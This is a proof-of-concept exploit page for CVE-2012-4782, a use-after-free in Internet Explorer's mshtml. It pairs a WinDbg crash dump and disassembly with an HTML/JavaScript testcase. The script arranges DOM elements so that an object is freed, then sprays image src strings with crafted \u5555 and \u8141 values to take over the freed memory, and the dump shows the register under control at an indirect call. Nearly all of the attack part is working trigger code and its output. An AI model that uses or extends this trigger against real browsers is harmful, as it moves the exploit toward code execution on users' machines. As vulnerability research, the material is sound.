CMarkup Use After Free Vulnerability - CVE-2012-4782 ( by https://twitter.com/__

1. CMarkup Use After Free Vulnerability - CVE-2012-4782 ( by https://twitter.com/__suto )
2. Click on page after load.
3. (a54.b48): Access violation - code c0000005 (!!! second chance !!!)
4. eax=00000000 ebx=00000000 ecx=55555555 edx=640386e0 esi=0831c4f0 edi=0caecfa8
5. eip=6383a618 esp=0831c4d0 ebp=0831c4e0 iopl=0         nv up ei pl zr na pe nc
6. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050246
7. mshtml!CTreeNode::ComputeFormats+0x9f:
8. 6383a618 8b11            mov     edx,dword ptr [ecx]  ds:0023:55555555=????????
9. 0:017> u
10. mshtml!CTreeNode::ComputeFormats+0x9f:
11. 6383a618 8b11            mov     edx,dword ptr [ecx]
12. 6383a61a 8b82c4000000    mov     eax,dword ptr [edx+0C4h]
13. 6383a620 ffd0            call    eax
14. 6383a622 8b400c          mov     eax,dword ptr [eax+0Ch]
15. 6383a625 57              push    edi
16. 6383a626 893e            mov     dword ptr [esi],edi
17. 6383a628 894604          mov     dword ptr [esi+4],eax
18. 6383a62b 8b0f            mov     ecx,dword ptr [edi]
19. ===================
20. <!doctype html>
21. <html>
22.     <head>
23.         <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
24.        
25.         <script>
26.                
27.            
28.                 function testcase(){
29.                
30.                 var img = new Array();
31.                   for(var i = 0;i < 100;i++){
32.                     img[i] = document.createElement('img');
33.                     img[i]["src"] = "a";   
34.                   }
35.                 document.body.appendChild(document.createElement('progress'));
36.                 document.body.appendChild(document.createElement("<track style='float:right'></track>"));  
37.                 document.body.appendChild(document.createElement('progress'));
38.                 document.body.appendChild(document.createElement('table'));
39.                 document.body.appendChild(document.createElement("<track style='float:right'></track>"));  
40.                 document.getElementsByTagName('progress').item(0).appendChild(document.createElement('frameset'));
41.                 document.getElementsByTagName('track').item(0).offsetWidth;            
42.                
43.                 document.getElementsByTagName('progress').item(1).appendChild(document.getElementsByTagName('track').item(0));
44.                 document.body.appendChild(document.createElement("<ins style='margin-left:2222222222px'></ins>"));
45.            
46.                 window.scroll(500);
47.            
48.                 for(var j = 0;j < 99;j++){
49.  
50.                      img[j]["src"] = "AAAAAAAAAAAAAAAAAAAAAAAA\u5555\u5555AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u8141\u4141AAAAAAAA";}
51.                    
52.                  }
53.  
54.                
55.            
56.                  
57.         </script>
58.     </head>
59.     <body onload='testcase();'>
60.        
61.     </body>
62. </html>